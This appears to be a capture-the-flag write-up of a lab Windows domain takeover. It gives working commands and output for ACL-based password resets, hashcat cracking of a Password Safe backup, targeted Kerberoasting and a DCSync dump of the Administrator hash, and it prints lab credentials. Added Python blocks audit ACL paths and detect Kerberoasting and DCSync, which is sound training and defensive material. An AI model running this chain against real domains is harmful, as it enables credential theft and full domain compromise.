Machine Info

Spoiler
Administrator is a medium-difficulty Windows machine designed around a complete domain compromise scenario, where credentials for a low-privileged user are provided. To gain access to the michael account, ACLs (Access Control Lists) over privileged objects are enumerated, leading us to discover that the user olivia has GenericAll permissions over michael, allowing us to reset his password. With access as michael, it is revealed that he can force a password change on the user benjamin, whose password is reset. This grants access to FTP where a backup.psafe3 file is discovered, cracked, and reveals credentials for several users. These credentials are sprayed across the domain, revealing valid credentials for the user emily. Further enumeration shows that emily has GenericWrite permissions over the user ethan, allowing us to perform a targeted Kerberoasting attack. The recovered hash is cracked and reveals valid credentials for ethan, who is found to have DCSync rights ultimately allowing retrieval of the Administrator account hash and full domain compromise.

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich.

User

Reconnaissance

We are going to start by running our nmap scan:

└─$ nmap -p$ports -sC -sV $VICTIM
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-31 13:20 CET
Nmap scan report for administrator.htb (10.129.5.192)
Host is up (0.043s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-31 19:20:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
50986/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
50997/tcp open  msrpc         Microsoft Windows RPC
51002/tcp open  msrpc         Microsoft Windows RPC
51005/tcp open  msrpc         Microsoft Windows RPC
51021/tcp open  msrpc         Microsoft Windows RPC
57513/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-01-31T19:21:14
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s

Let’s add dc.administrator.htb and administrator.htb to our /etc/hosts.

AD Enumeration

We are given credentials so we start with enumerating the AD.

└─$ impacket-lookupsid administrator.htb/[email protected]
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Brute forcing SIDs at administrator.htb
[*] StringBinding ncacn_np:administrator.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1088858960-373806567-254189436
498: ADMINISTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ADMINISTRATOR\Administrator (SidTypeUser)
501: ADMINISTRATOR\Guest (SidTypeUser)
502: ADMINISTRATOR\krbtgt (SidTypeUser)
512: ADMINISTRATOR\Domain Admins (SidTypeGroup)
513: ADMINISTRATOR\Domain Users (SidTypeGroup)
514: ADMINISTRATOR\Domain Guests (SidTypeGroup)
515: ADMINISTRATOR\Domain Computers (SidTypeGroup)
516: ADMINISTRATOR\Domain Controllers (SidTypeGroup)
517: ADMINISTRATOR\Cert Publishers (SidTypeAlias)
518: ADMINISTRATOR\Schema Admins (SidTypeGroup)
519: ADMINISTRATOR\Enterprise Admins (SidTypeGroup)
520: ADMINISTRATOR\Group Policy Creator Owners (SidTypeGroup)
521: ADMINISTRATOR\Read-only Domain Controllers (SidTypeGroup)
522: ADMINISTRATOR\Cloneable Domain Controllers (SidTypeGroup)
525: ADMINISTRATOR\Protected Users (SidTypeGroup)
526: ADMINISTRATOR\Key Admins (SidTypeGroup)
527: ADMINISTRATOR\Enterprise Key Admins (SidTypeGroup)
553: ADMINISTRATOR\RAS and IAS Servers (SidTypeAlias)
571: ADMINISTRATOR\Allowed RODC Password Replication Group (SidTypeAlias)
572: ADMINISTRATOR\Denied RODC Password Replication Group (SidTypeAlias)
1000: ADMINISTRATOR\DC$ (SidTypeUser)
1101: ADMINISTRATOR\DnsAdmins (SidTypeAlias)
1102: ADMINISTRATOR\DnsUpdateProxy (SidTypeGroup)
1108: ADMINISTRATOR\olivia (SidTypeUser)
1109: ADMINISTRATOR\michael (SidTypeUser)
1110: ADMINISTRATOR\benjamin (SidTypeUser)
1111: ADMINISTRATOR\Share Moderators (SidTypeAlias)
1112: ADMINISTRATOR\emily (SidTypeUser)
1113: ADMINISTRATOR\ethan (SidTypeUser)
3601: ADMINISTRATOR\alexander (SidTypeUser)
3602: ADMINISTRATOR\emma (SidTypeUser)

We tried password spraying and connecting to FTP, but neither succeeded. Let’s move on and run BloodHound.

└─$ bloodhound-python -d administrator.htb -u olivia  -dc dc.administrator.htb -ns $VICTIM  -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
Password: 
INFO: Found AD domain: administrator.htb                                                     
INFO: Getting TGT for user                                                                   
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known                  
INFO: Connecting to LDAP server: dc.administrator.htb                                        
INFO: Found 1 domains                                                                        
INFO: Found 1 domains in the forest                                                          
INFO: Found 1 computers                                                                      
INFO: Connecting to LDAP server: dc.administrator.htb                                        
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 11S

Pivot Users

From the results we find interesting domain privileges.

It shows that our known user olivia can pivot to michael, and then to benjamin, through the GenericAll and ForceChangePassword object controls. So the first step is to gain access to michael by changing his password.

└─$ net rpc password michael 'NewPass123!' -U 'ADMINISTRATOR.HTB/olivia%ichliebedich' -S administrator.htb
└─$ crackmapexec smb administrator.htb -u michael  -p 'NewPass123!' --continue-on-success
SMB         administrator.htb 445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         administrator.htb 445    DC               [+] administrator.htb\michael:NewPass123! 

We can confirm our attack worked. Without further post-enumeration as michael, we go straight on and do the same to pivot to user benjamin.

└─$ net rpc password benjamin 'NewPass123!' -U 'ADMINISTRATOR.HTB/michael%NewPass123!' -S administrator.htb
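
Seen from the defender's side, the object controls used in this write-up form a graph that can be audited for paths to replication rights. The following is an added example, not part of the original write-up: the edge list is constructed from the relationships the write-up describes (including the emily and ethan edges used later), and the function names are hypothetical.

```python
from collections import deque

# Rights that let the holder take over or impersonate the target principal.
ABUSABLE = {"GenericAll", "GenericWrite", "ForceChangePassword",
            "WriteDacl", "WriteOwner", "DCSync"}

# Constructed edge list (holder, right, target) mirroring this write-up.
# A real audit would export these edges from the directory's ACLs.
EDGES = [
    ("olivia", "GenericAll", "michael"),
    ("michael", "ForceChangePassword", "benjamin"),
    ("emily", "GenericWrite", "ethan"),
    ("ethan", "DCSync", "administrator.htb"),
    ("emma", "ReadProperty", "ethan"),  # constructed benign edge, ignored
]

def control_paths(edges, tier0):
    """Map each principal to its shortest abusable-rights path into tier 0."""
    graph = {}
    for holder, right, target in edges:
        if right in ABUSABLE:
            graph.setdefault(holder, []).append((right, target))
    results = {}
    for start in graph:
        seen, queue = {start}, deque([(start, [])])
        while queue:
            node, path = queue.popleft()
            if node in tier0 and path:
                results[start] = path
                break
            for right, target in graph.get(node, []):
                if target not in seen:
                    seen.add(target)
                    queue.append((target, path + [(node, right, target)]))
    return results

def edges_to_review(paths):
    """ACEs that sit on any tier-0 path: the first ones to review or revoke."""
    return sorted({edge for path in paths.values() for edge in path})

if __name__ == "__main__":
    found = control_paths(EDGES, tier0={"administrator.htb"})
    for principal, path in sorted(found.items()):
        print(principal, "->", " -> ".join(f"[{r}] {t}" for _, r, t in path))
```

On these edges olivia, michael and benjamin have no ACL path to the domain object; the two halves of the chain are joined only by the credentials stored in the Password Safe file, which an ACL-only audit does not see.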

Password Safe

Benjamin is a member of the Share Moderators group, so let’s see whether he is the one who can access the FTP share.

─$ ftp [email protected]
Connected to administrator.htb.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49435|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||49439|)
125 Data connection already open; Transfer starting.
100% |************************************************|   952       33.20 KiB/s    00:00 ETA
226 Transfer complete.

We come across Backup.psafe3. The .psafe3 extension is used by Password Safe for its database files, which are encrypted with a single master password.

From their website: Whether the answer is one or hundreds, Password Safe allows you to safely and easily create a secured and encrypted user name/password list. With Password Safe all you have to do is create and remember a single “Master Password” of your choice in order to unlock and access your entire user name/password list.

We find that Hashcat has a mode (5200) that can try to crack the password of the backup. Let’s use this.

psafe3 Cracked Password
└─$ hashcat -m 5200  Backup.psafe3  /usr/share/wordlists/rockyou.txt.gz              
hashcat (v7.1.2) starting

...
Backup.psafe3:tekieromucho
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Sat Jan 31 15:52:43 2026 (0 secs)
Time.Estimated...: Sat Jan 31 15:52:43 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:   959.4 kH/s (6.24ms) @ Accel:3 Loops:512 Thr:512 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 30720/14344385 (0.21%)
Rejected.........: 0/30720 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> *star*
Hardware.Mon.#01.: Temp: 53c Util: 53% Core:1905MHz Mem:6000MHz Bus:8

Started: Sat Jan 31 15:52:41 2026
Stopped: Sat Jan 31 15:52:44 2026

Looking at the picture, we can see the list of user credentials we can copy. The one from Emily Rodriguez is interesting for us.

Emily's Password
UXLCI5iETUsIBoFVTj8yQFKoHjXmb

With emily we can login to the DC and grab the user flag.


Root

More User Pivoting

Looking at our new user access, we see that emily also has interesting outbound object control: she has GenericWrite over ethan, who in turn has GetChangesAll on the administrator.htb domain, in other words he can perform DCSync. Let’s first abuse GenericWrite.

Info

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user.

With GenericWrite there are two routes for abusing this. One is a Shadow Credentials attack, where we write the msDS-KeyCredentialLink attribute on the target object (ethan) and authenticate as that principal using Kerberos PKINIT.

Alternatively, we can perform a targeted Kerberoast attack, as GenericWrite enables emily to set a ServicePrincipalName (SPN) on the targeted user. Then we request and crack the resulting hash. We will go with the latter!

For that we are going to use targetedKerberoast.py, a tool that performs that specific attack. To perform a targeted Kerberoast, we use the GenericWrite privilege to give ethan an SPN. Then we can request a ticket for that fake service and get a ticket encrypted with ethan’s password hash. If that password is weak, we can crack it offline.

└─$ faketime "$(ntpdate -q administrator.htb | cut -d ' ' -f 1,2)" targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' 

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$ae031d8d773710c1298fe036b3f29b6a$...
└─$ hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt.gz
hashcat (v7.1.2) starting


$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$ae031d8d773710c1298fe036b3f29b6a$...:<SPOILER>
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....839231
Time.Started.....: Sat Jan 31 17:14:23 2026 (0 secs)
Time.Estimated...: Sat Jan 31 17:14:23 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 45629.9 kH/s (6.63ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 655360/14344385 (4.57%)
Rejected.........: 0/655360 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> grassa
Ethan's password
limpbizkit
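
The targeted Kerberoast above leaves a recognizable pair of events on the domain controller: an SPN written to a user object (event 5136) followed shortly by an RC4 service ticket request for that same account (event 4769). The following detection sketch is an added example, not part of the original write-up; the sample events are constructed, and the correlation window and the CN-equals-account-name shortcut are assumptions.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per environment
RC4_HMAC = "0x17"               # etype 23, the $krb5tgs$23$ type shown above
VALUE_ADDED = "%%14674"         # 5136 OperationType code for "Value Added"

# Constructed sample events; keys follow Windows Security log field names.
EVENTS = [
    {"id": 5136, "time": "2026-01-31T17:10:02", "SubjectUserName": "emily",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "ObjectClass": "user", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "servicePrincipalName"},
    {"id": 4769, "time": "2026-01-31T17:10:03", "ServiceName": "ethan",
     "TargetUserName": "emily@ADMINISTRATOR.HTB", "TicketEncryptionType": "0x17"},
    {"id": 4769, "time": "2026-01-31T17:11:00", "ServiceName": "DC$",
     "TargetUserName": "olivia@ADMINISTRATOR.HTB", "TicketEncryptionType": "0x12"},
    {"id": 4769, "time": "2026-01-31T18:30:00", "ServiceName": "ethan",
     "TargetUserName": "emma@ADMINISTRATOR.HTB", "TicketEncryptionType": "0x17"},
]

def account_from_dn(dn):
    """Assumption: the object's CN equals its sAMAccountName."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def detect_targeted_kerberoast(events, window=WINDOW):
    """Alert on an RC4 ticket request that follows an SPN write to a user."""
    spn_writes, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5136:
            if (ev["ObjectClass"] == "user"
                    and ev["OperationType"] == VALUE_ADDED
                    and ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"):
                spn_writes[account_from_dn(ev["ObjectDN"])] = (when, ev["SubjectUserName"])
        elif ev["id"] == 4769 and ev["TicketEncryptionType"].lower() == RC4_HMAC:
            write = spn_writes.get(ev["ServiceName"].lower())
            if write and when - write[0] <= window:
                alerts.append({
                    "account": ev["ServiceName"].lower(),
                    "spn_written_by": write[1],
                    "ticket_requested_by": ev["TargetUserName"],
                    "seconds_after_write": int((when - write[0]).total_seconds()),
                })
    return alerts

if __name__ == "__main__":
    for alert in detect_targeted_kerberoast(EVENTS):
        print(alert)
```

Event 5136 is only logged when Directory Service Changes auditing is enabled and the object's SACL covers the write.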

Lastly we can perform a DCSync attack with ethan and get domain admin.

└─$ impacket-secretsdump administrator.htb/[email protected]
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<SPOILER>:::
Administrator Hash
3dc553ce4b9fd20bd016e098d2d2fd2e

We can now log in to the DC as admin (Pass the Hash) and get the root flag.
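
The DRSUAPI replication used in the last step shows up on the domain controller as event 4662 carrying the replication extended-right GUIDs, requested by an account that is not a domain controller. The following detection sketch is an added example, not part of the original write-up; the sample events are constructed and the allowlist of replicating accounts is an assumption.

```python
import re

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All
REPLICATION_RIGHTS = {GET_CHANGES: "GetChanges", GET_CHANGES_ALL: "GetChangesAll"}
CONTROL_ACCESS = 0x100   # access mask bit for extended rights
KNOWN_DCS = {"dc$"}      # assumed allowlist; DC$ is the only DC in this lab
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample 4662 events; keys follow Windows Security log field names.
EVENTS_4662 = [
    {"SubjectUserName": "DC$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "emily", "AccessMask": "0x10",  # plain property read
     "Properties": "{00000000-0000-0000-0000-000000000001}"},
]

def detect_dcsync(events, known_dcs=KNOWN_DCS):
    """Report non-DC accounts that exercised directory replication rights."""
    seen = {}
    for ev in events:
        subject = ev["SubjectUserName"].lower()
        if subject in known_dcs:
            continue  # legitimate DC-to-DC replication
        if int(ev["AccessMask"], 16) & CONTROL_ACCESS == 0:
            continue  # not an extended-right access
        for guid in GUID_RE.findall(ev["Properties"]):
            right = REPLICATION_RIGHTS.get(guid.lower())
            if right:
                seen.setdefault(subject, set()).add(right)
    return {
        subject: {"rights": sorted(rights),
                  "severity": "high" if "GetChangesAll" in rights else "medium"}
        for subject, rights in seen.items()
    }

if __name__ == "__main__":
    for subject, finding in detect_dcsync(EVENTS_4662).items():
        print(subject, finding)
```

Event 4662 is only logged when Directory Service Access auditing is enabled and the domain object's SACL audits these extended rights.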